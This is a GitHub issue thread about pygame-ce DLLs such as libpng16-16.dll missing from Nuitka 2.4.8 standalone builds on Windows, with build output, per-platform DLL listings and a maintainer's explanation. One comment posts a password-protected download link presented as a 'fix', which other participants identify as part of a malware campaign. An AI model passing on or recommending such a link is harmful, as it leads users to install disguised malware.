### ISSUE TITLE
`pygame-ce` still broken on Nuitka 2.4.8

### ISSUE THREAD

**Issue by oddbookworm** [Nuitka/Nuitka#3100]
#2947 was supposed to fix the missing DLL problems that pygame/pygame-ce had with Nuitka, but version 2.4.8 still has those missing DLLs. I noticed that the actual DLL part of the pull request is no longer present in the config file, which is probably the cause of the regression from my pull request.

[reproducer.zip](https://github.com/user-attachments/files/16790297/reproducer.zip)
[verbose nuitka build output](https://github.com/user-attachments/files/16790298/nuitka-output.txt)

build command:
```
python -m nuitka --standalone main.py --include-data-files=./alien1.png=alien1.png --include-data-files=./alien1.jpg=alien1.jpg --include-data-files=./Roboto-Regular.ttf=Roboto-Regular.ttf --include-data-files=./boom.wav=boom.wav --include-data-files=./MIDI_sample.mid=MIDI_sample.mid
```

```
❯ python -m nuitka --version                                                                                                                                                                        
2.4.8
Commercial: None
Python: 3.12.4 (tags/v3.12.4:8e8a4ba, Jun  6 2024, 19:30:16) [MSC v.1940 64 bit (AMD64)]
Flavor: CPython Official
Executable: C:\Users\andre\Downloads\reproducer\venv\Scripts\python.exe
OS: Windows
Arch: x86_64
WindowsRelease: 11
Version C compiler: C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Tools\MSVC\14.40.33807\bin\Hostx64\x64\cl.exe (cl 14.3).
```

```
(venv) ~\Downloads\reproducer
❯ cd main.dist 
(venv) ~\Downloads\reproducer\main.dist
❯ .\main.exe
pygame-ce 2.5.1 (SDL 2.30.6, Python 3.12.4)
Traceback (most recent call last):
  File "C:\Users\andre\DOWNLO~1\REPROD~1\MAIN~1.DIS\main.py", line 37, in <module>
  File "C:\Users\andre\DOWNLO~1\REPROD~1\MAIN~1.DIS\main.py", line 23, in __init__
pygame.error: Failed loading libpng16-16.dll: The specified module could not be found.
```

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by oddbookworm** [comment]
> https://github.com/aravinda-gamage/x86_64-win64-ranlib

What are you even talking about? That github user doesn't even exist

**Comment by KRRT7** [comment]
> > https://github.com/aravinda-gamage/x86_64-win64-ranlib
> 
> What are you even talking about? That github user doesn't even exist

that message is part of an active malware campaign, ignore it, @Maxwell175 @kayhayen if you can remove it please

**Comment by kayhayen** [comment]
Just as an aside, please don't quote malware links, that makes it such that they are not also automatically deleted, when the user becomes deleted, and I have to do it then myself.

The DLL inclusion had an issue that I found during testing on macOS, namely that the prefix "" was catching on the extension modules there as DLLs and duplicated every single one of them under their original name. Making a name up now, `_camera.so` and `_camera.cpython312.dylib.so` both existed. 

We have a test using pygame in Nuitka-Watch that revealed this automatically. There were too many DLLs added.

I inferred that to be definitely not the intention, and release-blocking, so I went ahead and instead pulled the submodules in as dependencies.

Using the empty prefix in this case was maybe functional, maybe not too bad on Windows (since DLL and extension modules are more clearly delinated there), but not good for Linux and macOS, which probably don't have DLLs. I think I checked. The `--list-package-dlls` is capable of recognizing extension module DLLs and doesn't list them, I seem to recall. 

One day, when Nuitka is capable of recognizing extension modules vs. DLLs on all platforms, currently it can do only Linux and macOS, we can just scan for all DLL files and include them for a package. But right now, they better live in a subfolder for that to work.

**Comment by kayhayen** [comment]
Yes, of course, limiting your prefix to Windows only, would probably be doable. I have really sad internet access here, otherwise I would have checked that the DLLs are Windows only and restored it with a `when: win32` clause already.

**Comment by kayhayen** [comment]
Actually, seems now it's OK, for macOS I got these:

```
python3.12 bin/nuitka --list-package-dlls=pygame
Nuitka-Tools: Checking package directory
Nuitka-Tools: '/Library/Frameworks/Python.framework/Versions/3.12/lib/python3.12/site-packages/pygame' ..
/Library/Frameworks/Python.framework/Versions/3.12/lib/python3.12/site-packages/pygame/.dylibs
  libFLAC.8.dylib
  libSDL2-2.0.0.dylib
  libSDL2_image-2.0.0.dylib
  libSDL2_mixer-2.0.0.dylib
  libSDL2_ttf-2.0.0.dylib
  libbrotlicommon.1.0.9.dylib
  libbrotlidec.1.0.9.dylib
  libfluidsynth.3.1.1.dylib
  libfreetype.6.dylib
  libglib-2.0.0.dylib
  libgthread-2.0.0.dylib
  libintl.8.dylib
  libjpeg.62.3.0.dylib
  libmodplug.1.dylib
  libmpg123.0.dylib
  libogg.0.8.5.dylib
  libopus.0.dylib
  libopusfile.0.dylib
  libpng16.16.dylib
  libportmidi.2.0.3.dylib
  libsharpyuv.0.dylib
  libsndfile.1.0.34.dylib
  libtiff.5.8.0.dylib
  libvorbis.0.4.9.dylib
  libvorbisenc.2.0.12.dylib
  libvorbisfile.3.3.8.dylib
  libwebp.7.dylib
  libz.1.2.11.zlib-ng.dylib
Nuitka-Tools: Found 28 DLLs.
```

**Comment by kayhayen** [comment]
For Linux, I got this

```
python3.12 bin/nuitka --list-package-dlls=pygame
Nuitka-Tools: Checking package directory '/home/hayen/.local/lib/python3.12/site-packages/pygame' ..
Nuitka-Tools: Found 0 DLLs.
```

**Comment by kayhayen** [comment]
For Windows I get this 

```
Nuitka-Tools: Checking package directory 'C:\Python312_64\Lib\site-packages\pygame' ..
C:\Python312_64\Lib\site-packages\pygame
  SDL2.dll
  SDL2_image.dll
  SDL2_mixer.dll
  SDL2_ttf.dll
  freetype.dll
  libjpeg-9.dll
  libmodplug-1.dll
  libogg-0.dll
  libopus-0.dll
  libopusfile-0.dll
  libpng16-16.dll
  libtiff-5.dll
  libwebp-7.dll
  portmidi.dll
  zlib1.dll
Nuitka-Tools: Found 15 DLLs.
```

**Comment by kayhayen** [comment]
So, it seems Windows and macOS need treatment. I wonder why my pygame case was working, I maybe never tried anything but Linux, that could explain it I guess, since there the DLLs seem to be expected to come from the OS.

**Comment by oddbookworm** [comment]
In the build above in the issue, here are all the dlls that Nuitka did catch:
```
$ ls main.dist | grep "dll"
freetype.dll*
libcrypto-3.dll*
libffi-8.dll*
libssl-3.dll*
portmidi.dll*
python312.dll*
sdl2.dll*
sdl2_image.dll*
sdl2_mixer.dll*
sdl2_ttf.dll*
vcruntime140.dll*
vcruntime140_1.dll*
```
Note that the dlls it did catch are the dlls directly used for our compiled dependencies. The other dlls included by us are dependencies of our precompiled dependencies

**Comment by kayhayen** [comment]
I have too bad internet connection for this right now, sorry for the delay, I will be able to clean this up this in a week.

**Comment by kayhayen** [comment]
This has been released as part of a hotfix in the mean time.
